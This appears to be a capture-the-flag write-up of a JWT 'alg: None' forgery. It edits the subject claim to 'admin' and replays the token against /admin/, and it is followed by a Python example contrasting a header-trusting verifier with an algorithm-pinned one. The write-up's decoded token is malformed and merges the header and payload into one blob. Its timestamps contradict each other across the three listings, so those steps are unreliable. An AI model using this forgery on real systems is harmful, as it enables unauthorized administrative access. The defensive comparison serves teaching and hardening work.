Capture the request.
Send the token to the decoder to decode it:
{"alg":"None","typ":"jwtIn0.[{"iss":"admin","iat":1695184101,"exp":1695191301,"nbf":1695184101,"sub":"user","jti":"65e1de8b9f861e796a1e77ca36f669d6"fV0
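- iss: the issuer is admin
- iat/nbf: the issued-at time is 1695185318
- exp: the expiry time is 1695192518
- sub: the subject is the user "user"
- jti: the unique identifier of the JWT
Change the value of sub to admin, then Base64-encode the result directly: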
eyJhbGciOiJOb25lIiwidHlwIjoiand0SW4wLlt7ImlzcyI6ImFkbWluIiwiaWF0IjoxNjk1MTgzNDcwLCJleHAiOjE2OTUxOTA2NzAsIm5iZiI6MTY5NTE4MzQ3MCwic3ViIjoiYWRtaW4iLCJqdGkiOiI4MWM0NzUwYTU0OTljOTZjYWVkNTgzZWE5MjcyZmJlZCJmVjA=
Send a request to /admin/ using this token.
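
Why the edited token is accepted, and the server-side fix, as an added example (not code from the original writeup or from the challenge): a verifier that lets the token's own `alg` header decide whether a signature is checked, next to one that pins the algorithm. The HS256 algorithm, the key, the function names and the sample tokens are assumptions constructed for this illustration.

```python
import base64, hashlib, hmac, json

KEY = b"constructed-demo-key"  # assumption: server-side HS256 secret, made up here

def b64d(s):  # base64url decode, restoring stripped padding
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))

def b64e(obj):  # compact JSON -> unpadded base64url
    raw = json.dumps(obj, separators=(",", ":")).encode()
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()

def hs256(signing_input):  # HMAC-SHA256 over "header.payload", base64url
    mac = hmac.new(KEY, signing_input.encode(), hashlib.sha256).digest()
    return base64.urlsafe_b64encode(mac).rstrip(b"=").decode()

def issue(claims):
    body = b64e({"alg": "HS256", "typ": "jwt"}) + "." + b64e(claims)
    return body + "." + hs256(body)

def verify_trusting_header(token):
    """Flawed: the token's own header decides whether a signature is checked."""
    h, p, sig = token.split(".")
    if json.loads(b64d(h)).get("alg", "").lower() != "none":
        if not hmac.compare_digest(hs256(h + "." + p).encode(), sig.encode()):
            raise ValueError("bad signature")
    return json.loads(b64d(p))

def verify_pinned(token):
    """Hardened: algorithm fixed server-side; exact match, signature mandatory."""
    parts = token.split(".")
    if len(parts) != 3 or not parts[2]:
        raise ValueError("malformed or unsigned token")
    h, p, sig = parts
    if json.loads(b64d(h)).get("alg") != "HS256":  # also rejects "None", "nOnE"
        raise ValueError("unexpected alg")
    if not hmac.compare_digest(hs256(h + "." + p).encode(), sig.encode()):
        raise ValueError("bad signature")
    return json.loads(b64d(p))

# Constructed sample tokens; claim names follow the decoded token above.
CLAIMS = {"iss": "admin", "sub": "user", "jti": "constructed-id"}
SIGNED = issue(CLAIMS)
UNSIGNED = b64e({"alg": "None", "typ": "jwt"}) + "." + b64e({**CLAIMS, "sub": "admin"}) + "."

if __name__ == "__main__":
    print("flawed verifier sub:", verify_trusting_header(UNSIGNED)["sub"])
    print("pinned verifier sub:", verify_pinned(SIGNED)["sub"])
```

Calling `verify_pinned(UNSIGNED)` raises `ValueError`, and it still does if a dummy signature is appended, because the `alg` comparison is an exact allowlist match rather than a denylist of "none" spellings.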